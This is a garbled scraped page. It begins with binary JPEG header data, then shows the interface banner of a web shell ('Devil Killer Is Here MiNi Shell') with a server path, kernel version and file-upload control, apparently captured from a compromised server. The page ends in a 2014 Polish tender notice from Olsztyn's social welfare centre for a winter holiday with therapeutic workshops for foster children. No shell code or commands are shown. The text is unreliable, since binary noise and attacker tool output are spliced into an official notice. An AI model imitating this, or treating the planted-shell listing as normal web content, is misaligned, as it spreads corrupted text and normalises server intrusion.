JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140107/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140107/5762-N-2014.html

<p class="kh_header"><b>Olsztyn: ZORGANIZOWANIE WYPOCZYNKU W OKRESIE FERII ZIMOWYCH  POŁĄCZONEGO  Z WARSZTATAMI PROFILAKTYCZNO - TERAPEUTYCZNYMI  DLA DZIECI ZAGROŻONYCH UZALEŻNIENIAMI, PRZEBYWAJĄCYCH W RODZINACH ZASTĘPCZYCH</b><br>
<b>Numer ogłoszenia: 5762 - 2014; data zamieszczenia: 07.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , al. M. J. Piłsudskiego 61A, 10-449 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5340414, faks 089 5340538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE WYPOCZYNKU W OKRESIE FERII ZIMOWYCH  POŁĄCZONEGO  Z WARSZTATAMI PROFILAKTYCZNO - TERAPEUTYCZNYMI  DLA DZIECI ZAGROŻONYCH UZALEŻNIENIAMI, PRZEBYWAJĄCYCH W RODZINACH ZASTĘPCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
1.Przedmiotem zamówienia w postępowaniu realizowanym w trybie przetargu nieograniczonego jest: 
zorganizowanie wypoczynku w okresie ferii zimowych połączonego z warsztatami profilaktyczno -  terapeutycznymi dla 30 dzieci zagrożonych uzależnieniami, przebywających w rodzinach zastępczych. 
2.Uczestnikami wypoczynku będzie grupa 30 dzieci przebywających w rodzinach zastępczych w wieku 7-21 lat wskazanych przez Miejski Ośrodek Pomocy Społecznej w Olsztynie. Zamawiający dopuszcza zmniejszenie liczby uczestników do 27 osób.
3.Miejsce zorganizowania 9-cio dniowego wypoczynku połączonego z warsztatami profilaktyczno terapeutycznymi  -  okolice Zakopanego tj. Murzasichle, Białka Tatrzańska, Poronin Bukowina Tatrzańska. 
4. Termin zorganizowania wypoczynku :  01.02.2014r. - 09.02.2014r.
5. Zakres zajęć profilaktyczno - terapeutycznych dla uczestników  wypoczynku znajduje się w załączniku nr 10 od SIWZ.
6.Wykonawca zapewni :
6.1.Obiekt: ośrodek, pensjonat usytuowany w niewielkiej odległości od Zakopanego miejscowości Murzasichle, Białka Tatrzańska, Poronin Bukowina Tatrzańska, całoroczny, ogrzewany dysponujący pokojami 2,3-4 osobowymi z łazienkami, minimum 1 salą dydaktyczną dla 15 osób, wyposażoną w pomoce dydaktyczne: tablica standardowa sucho ścieralna, flipchart z zapasem kartek, w sprzęt audiowizualny (laptop 3 szt, rzutnik, telewizor), świetlicą z TV i wideo, kuchnią i stołówką na terenie obiektu.  Obiekt musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.).
6.2. Zakwaterowanie:
6.2.1Zakwaterowanie uczestników w pokojach 2,3-4 osobowych z łazienką wyposażonych w jednoosobowe łóżka, szafy i inne sprzęty umożliwiające rozpakowanie bagażu przez każdego uczestnika. Przez łazienkę Zamawiający rozumie przypisane do pokoju pomieszczenie wyposażone w umywalkę, prysznic lub wannę oraz toaletę. 
6.2.2 Wykonawca zapewnia osobne pokoje dla wychowawców obok pokojów dzieci a także osobne pokoje dla dziewcząt i osobne dla chłopców. Pokoje dla dzieci oraz wychowawców winny znajdować się w wyznaczonej części budynku do wyłącznej dyspozycji grupy.
6.2.3 Zakwaterowanie uczestników w jednym budynku przez cały czas trwania wypoczynku                           (8 noclegów).
6.2.4 Dostęp do świetlicy na terenie obiektu;
Nie dopuszcza się możliwości zakwaterowania dzieci w domkach kempingowych, budynkach szkolnych, internatach, bursach.
6.3. Wyżywienie dla wszystkich uczestników wypoczynku  na terenie obiektu: 
Wyżywienie obejmuje
6.3.1 Trzy posiłki dziennie: śniadanie, obiad dwudaniowy (zupa + drugie danie, surówki + napój), kolacja 
Posiłki muszą być urozmaicone, sycące, odpowiadające normom zarówno pod względem ilości, jakości oraz  wartości odżywczych.
6.3.2 Możliwość wieczornego dożywiania /min. chleb + masło i dżem/, całodobowy dostęp do napojów               / ciepła herbata, woda z  sokiem/,
6.3.3 Napoje i suchy prowiant na drogę powrotną trwającą około 12 godz.
Posiłki będą przygotowane zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w Ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia Dz. U.  2010 Nr 136, poz. 914 z późn. zm.);  
Podczas pobytu należy zapewnić 8 śniadań, 7 obiadów dwudaniowych, 1 obiadokolację, 7 kolacji .
(Pierwszy dzień zaczyna się obiadokolacją, ostatni dzień kończy się śniadaniem).
   
6.4. Opieka  pedagogiczna, terapeutyczna  i medyczna : 
6.4.1Zapewnienie całodobowej opieki przez kierownika wypoczynku osobę posiadającą ukończony kurs dla kierowników placówek wypoczynku oraz co najmniej trzyletni staż pracy opiekuńczo-wychowawczej lub dydaktyczno wychowawczej i minimum 2 opiekunów/wychowawców nad uczestnikami wypoczynku (1 opiekun na grupę 15 osobową) posiadających min. trzyletnie doświadczenie zawodowe w pracy z dziećmi, wykształcenie pedagogiczne i kurs wychowawcy kolonijnego. 
6.4.2 Zapewnienie przeprowadzenia warsztatów profilaktyczno - terapeutycznych dla uczestników wypoczynku przez psychologa i nauczyciela informatyka:
- zajęcia z psychologiem przewidziane przez 6 dni po 2 godz. lekcyjne w II grupach po 15 osób,
- zajęcia z nauczycielem informatykiem przewidziane przez 6 dni  po 1 godz. lekcyjnej dla  I grupy 10 osób w wieku 15-21 lat,
6.4.3 zapewnienie przeprowadzenia zajęć sportowych zajęcia sportowe: zorganizowanie nauki jazdy na nartach i snowboardzie przez zapewnienie 4 instruktorów nauki jazdy (snowboard i narty), którzy poprowadzą zajęcia przez 3 dni po 2 godz.  w  grupach po 5 osób. Zapewnienie całodziennych karnetów na wyciąg dla wszystkich dzieci przez 7 dni  oraz sprzętu (narty carwingowe ok. 10 szt, snowboard ok. 20 szt.)  kaski i buty dla wszystkich dzieci przez 7 dni.
6.4.4 Zapewnienie dostępu do opieki zdrowotnej stosownie do przepisów ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. z 2008r. Nr 164, poz. 1027 z późn. zm.) oraz przepisów ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2004 r. Nr 256, poz. 2572 z późn. zm.)- lekarz pierwszego kontaktu na każde wezwanie lub z możliwością skorzystania z dowozu przez Wykonawcę do lekarza. 
6.4.4 Zapewnienie izolatki dla dzieci chorych.

6.5. Wymagania dotyczące zorganizowania czasu wolnego
6.5.1 organizacja wycieczek z zapewnieniem opłacenia wszystkich biletów wstępu do zwiedzanych obiektów np. do Zakopanego  (zwiedzanie Muzeum Tatrzańskiego)
6.5.2 Organizacja  dyskotek, karaoke
6.5.3 Organizacja ogniska z pieczeniem kiełbasek,
6.5.4 Organizacja zajęć sportowych
6.5.5 Wykorzystanie miejscowych i okolicznych form rekreacji.
6.5.6 Zapewnienie dostępu do sprzętu sportowo-rekreacyjnego oraz  gier świetlicowych /szachy, warcaby, inne gry planszowe, w miarę możliwości stół do tenisa stołowego z rakietkami.
6.5.7 inne imprezy zaakceptowane przez kierownika grupy
przy czym Zamawiający zastrzega, że w przypadku jeżeli warunki pogodowe będą niekorzystne, uniemożliwiające organizacje zajęć sportowych w miejscowości zakwaterowania przez cały okres trwania wypoczynku tj. zamknięcie wyciągów narciarskich w ramach kosztów ujętych w preliminarzu kosztów pod pozycja 1.5,2.1i 2.2  wykonawca zapewni wyjście na basen, kręgielnię oraz 3 wyjazdy do miejscowości z czynnymi wyciągami narciarskimi.

6.6 W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązuje się do:
6.6.1.Zapewnienia transportu uczestnikom wypoczynku z Olsztyna do Zakopanego przejazd pociągiem, z dworca PKP na miejsce zakwaterowania przejazd autokarem (przejazd w ciągu dnia); zapewnienia transportu z miejsca zakwaterowania na dworzec PKP w Zakopanem przejazd autokarem,                              z Zakopanego do Olsztyna przejazd pociągiem (przejazd w ciągu dnia ).
Zbiórka dzieci przed wyjazdem na wypoczynek przewidziana jest na dworcu PKP  w Olsztynie na  jedną godzinę  przed planowanym odjazdem pociągu. Odbiór dzieci z wypoczynku na dworcu PKP w Olsztynie przez opiekuna  lub powrót  samodzielny na podstawie zgody opiekuna dostarczonej organizatorowi przez wyjazdem na wypoczynek. 
6.6.2 Zapewnienia opieki podczas pobytu i podróży w obie strony min 1 opiekun na 15 osób;
6.6.3 Przeprowadzenia zajęć profilaktyczno - terapeutycznych dla uczestników wypoczynku wg załącznika nr 10 do SIWZ
6.6.4 Przygotowania sprawozdania z wypoczynku połączonego z warsztatami profilaktyczno terapeutycznymi dla dzieci zagrożonych uzależnieniami, przebywających w rodzinach zastępczych                    z indywidualnymi opiniami o każdym uczestniku ( imię i nazwisko, wiek, mocne i słabe strony, funkcjonowanie i rola w grupie, aktywność w czasie zajęć) i dostarczenie go Zamawiającemu  nie później niż w dniu wystawienia faktury za zorganizowanie wypoczynku. 
6.6.5 Zapewnienie ubezpieczenia każdego z uczestników wypoczynku na okres ich transportu oraz na czasu trwania wypoczynku. 
-pakiet ubezpieczenia NNW na wypadek śmierci oraz 100% uszczerbku na zdrowiu  20.000zł. 
-zakres ochrony: zakres terytorialny: RP, czas trwania ochrony 24 godz
6.6.6. Zgłoszenia  niezwłocznie po podpisaniu umowy a przed rozpoczęciem turnusu i  dostarczenie do Zamawiającego zaświadczenia o zgłoszeniu wypoczynku zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.) pod rygorem odstąpienia od umowy
6.6.7. Przygotowania szczegółowej informacji dotyczącej wyjazdu (godz wyjazdu i powrotu, informacji o niezbędnych rzeczach do zabrania, podanie numeru kontaktowego dla rodziców zastępczych), utrzymanie kontaktu z pracownikiem zespołu ds. pieczy zastępczej.

Wykonawcy są zobowiązani do starannego zapoznania się z przedmiotem zamówienia, wszystkimi czynnikami mającymi wpływ na kształtowanie się cen ofertowych oraz warunkami wykonania zamówienia 
Wykaz dzieci zakwalifikowanych do wypoczynku przekazany będzie Wykonawcy po wyborze oferty przed wyjazdem na wypoczynek..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.24.10.00-1, 63.50.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 9.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
Oświadczenia o spełnianiu warunków określonych w art.22 ust.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego: 1. Oświadczenia o spełnianiu warunków określonych w art.22 ust.1. 
2.Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy lub usługi zostały wykonane lub są wykonywane należycie. 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 usługi odpowiadające swoim rodzajem i wartością przedmiotowi
zamówienia, przy czym przez jedną usługę rozumie się zorganizowanie turnusu minimum 9 - dniowego dla minimum 30 dzieci.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1. 
2. Wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada, lub przedstawi pisemne zobowiązanie innego podmiotu, że dysponuje odpowiednia bazą noclegową do wykonania zamówienia tj. ośrodkiem, pensjonatem usytuowanym w niewielkiej odległości od Zakopanego (tj miejscowości Murzasichle lub Białka Tatrzańska, Poronin , Bukowina Tatrzańska), całoroczny, ogrzewany dysponujący pokojami 2,3-4 osobowymi z łazienkami, minimum 1 salą dydaktyczną dla 15osób, wyposażoną w pomoce dydaktyczne: tablica standardowa sucho ścieralna, flipchart z zapasem kartek, w sprzęt audiowizualny (laptop 3 szt, rzutnik, telewizor), świetlicą z TV i wideo, kuchnią i stołówką na terenie obiektu. Obiekt spełnia wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
1.Oświadczenia o spełnianiu warunków określonych w art.22 ust.1. 
2.Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje kadrą: 
- kierownikiem wypoczynku osobą posiadającą ukończony kurs dla kierowników placówek wypoczynku oraz co najmniej trzyletni staż pracy opiekuńczo-wychowawczej lub dydaktyczno wychowawczej .
- minimum 2 opiekunów/wychowawców posiadających trzyletnie doświadczenie zawodowe w pracy z dziećmi, wykształcenie pedagogiczne i kurs wychowawcy kolonijnego.
 - psychologa posiadającego, co najmniej trzyletni staż pracy z dziećmi.
-  nauczyciela, informatyka</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie:
Oświadczenia o spełnianiu warunków określonych w art.22 ust.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty- załącznik nr 1 do SIWZ.
2.Preliminarz kosztów - załącznik nr 8 do SIWZ.
3.Pełnomocnictwo/pełnomocnictwa - jeżeli dotyczy. Złożone w formie oryginału lub kopii poświadczonej za przez notariusza, ustanawiające osobę/osoby do reprezentowania Wykonawcy.
4.Zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia-jeżeli dotyczy.
5. Dowody potwierdzające wykonanie usług, o których mowa w rozdziale 6 pkt 1 ppkt 1.2 SIWZ:
- poświadczenie z tym, że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub
ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu
składania ofert,
- w przypadku zamówień na dostawy lub usługi - oświadczenie Wykonawcy - jeżeli z uzasadnionych
przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym
mowa powyżej.
-Jeżeli dostawy lub usługi wskazane w wykazie, zostały wcześniej wykonane na rzecz Zamawiającego, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w rozdziale 6 pkt 4 ppkt 4.5 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia: 
-dopuszcza się zmniejszenie ilości osób uczestniczących w wypoczynku w stosunku do liczby podanej w ogłoszeniu i SIWZ w zależności od liczby chętnych osób nie więcej jednak niż 3 osoby, w takim przypadku Zamawiający zapłaci Wykonawcy wynagrodzenie za faktyczną liczbę osób uczestniczących w wypoczynku a cena jednostkowa brutto za udział 1 uczestnika będzie podstawą do ustalenia 
i rozliczenia ostatecznej wartości zamówienia,
-Zamawiający dopuszcza zmianę kadry w trakcie realizacji zamówienia, w okresie przed wystąpieniem takiej sytuacji z zastrzeżeniem, iż osoby te będą miały uprawnienia, doświadczenie 
i wiedzę  w stopniu nie niższym niż osoby zaproponowane przez Wykonawcę o czym Wykonawca powiadomi Zamawiającego w formie pisemnej z załączeniem wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
